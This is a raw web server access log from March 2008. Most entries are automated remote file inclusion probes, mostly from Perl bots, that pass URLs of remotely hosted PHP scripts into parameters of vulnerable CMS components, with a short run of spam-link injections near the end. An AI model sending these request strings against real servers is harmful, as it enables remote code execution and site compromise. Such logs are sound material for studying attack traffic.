193.138.206.219 - - [04/Mar/2008:06:37:37 -0800] "GET //index.php?command=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:06:37:52 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [04/Mar/2008:06:37:57 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:37:59 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:38:13 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:38:13 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:38:13 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:38:30 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.81.213.24 - - [04/Mar/2008:06:38:38 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.pcr.ac.id/~rina/includes/db/alba.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:06:38:41 -0800] "GET /logs/SQuery/lib/unreal.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:06:38:41 -0800] "GET /SQuery/lib/unreal.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:38:42 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.144.182 - - [04/Mar/2008:06:39:18 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:39:20 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:39:20 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:39:20 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.144.182 - - [04/Mar/2008:06:39:21 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:39:39 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:06:39:45 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:39:57 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:40:03 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:40:03 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:40:03 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [04/Mar/2008:06:40:35 -0800] "GET /config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.172 - - [04/Mar/2008:06:40:55 -0800] "GET /retreat1/?D=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:40:55 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:41:09 -0800] "GET //surveys/survey.inc.php?path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:41:09 -0800] "GET /logs//surveys/survey.inc.php?path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:41:10 -0800] "GET //surveys/survey.inc.php?path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:41:10 -0800] "GET /logs//surveys/survey.inc.php?path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:41:10 -0800] "GET //surveys/survey.inc.php?path=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
194.65.16.66 - - [04/Mar/2008:06:41:11 -0800] "GET /logs//surveys/survey.inc.php?path=http://surgut-spid.ru/language/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
206.212.247.135 - - [04/Mar/2008:06:41:16 -0800] "GET /logs/access_080131.log/?path[docroot]=http://acs-fungamer.de/images/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:06:41:26 -0800] "GET /logs/access_080122.log/errors.php?error=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:06:41:26 -0800] "GET /errors.php?error=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:06:41:26 -0800] "GET /logs/errors.php?error=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.161.97.124 - - [04/Mar/2008:06:41:30 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [04/Mar/2008:06:41:31 -0800] "GET /config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.161.97.124 - - [04/Mar/2008:06:41:32 -0800] "GET /logs/config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:41:45 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:41:45 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:41:45 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:42:01 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:06:42:14 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:06:42:14 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:06:42:14 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.20.117.47 - - [04/Mar/2008:06:42:23 -0800] "GET /logs/access_080103.log/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.117.47 - - [04/Mar/2008:06:42:24 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.117.47 - - [04/Mar/2008:06:42:24 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.215.105 - - [04/Mar/2008:06:42:27 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.215.105 - - [04/Mar/2008:06:42:32 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.20.117.47 - - [04/Mar/2008:06:42:35 -0800] "GET /logs/access_080128.log/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.215.105 - - [04/Mar/2008:06:42:37 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:42:43 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:42:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:42:44 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:06:42:46 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:06:42:47 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:06:42:49 -0800] "GET //include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:06:42:50 -0800] "GET //include.php?path[docroot]=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:06:42:52 -0800] "GET /logs//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:06:42:53 -0800] "GET /logs//include.php?path[docroot]=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:43:33 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:44:49 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:44:49 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:44:49 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:06:44:58 -0800] "GET /logs/access_080208.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:06:44:58 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [04/Mar/2008:06:44:59 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.179.215 - - [04/Mar/2008:06:45:07 -0800] "GET /logs/access_071109.log HTTP/1.0" 200 29983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:45:07 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:45:08 -0800] "GET /convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:45:08 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:45:59 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:45:59 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:46:00 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:06:46:06 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:06:46:39 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:06:46:39 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:06:47:15 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:06:47:15 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.86.69.34 - - [04/Mar/2008:06:47:25 -0800] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.69.34 - - [04/Mar/2008:06:47:25 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.69.34 - - [04/Mar/2008:06:47:25 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.223.12 - - [04/Mar/2008:06:47:30 -0800] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.handball-club-sarrebourg.com/components/com_extcalendar/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:47:46 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:47:59 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:48:07 -0800] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:48:07 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:48:07 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:48:47 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:48:50 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:48:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:24 -0800] "GET / HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:25 -0800] "GET /?D=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:25 -0800] "GET /?D=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:25 -0800] "GET /?D=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:49:25 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:25 -0800] "GET /?M=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:25 -0800] "GET /?M=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:49:25 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:26 -0800] "GET /?M=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:49:26 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:26 -0800] "GET /?S=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:26 -0800] "GET /?S=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:26 -0800] "GET /?S=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:26 -0800] "GET /?N=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:26 -0800] "GET /?N=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:27 -0800] "GET /?N=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:27 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:27 -0800] "GET /plans/ HTTP/1.0" 200 1095 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
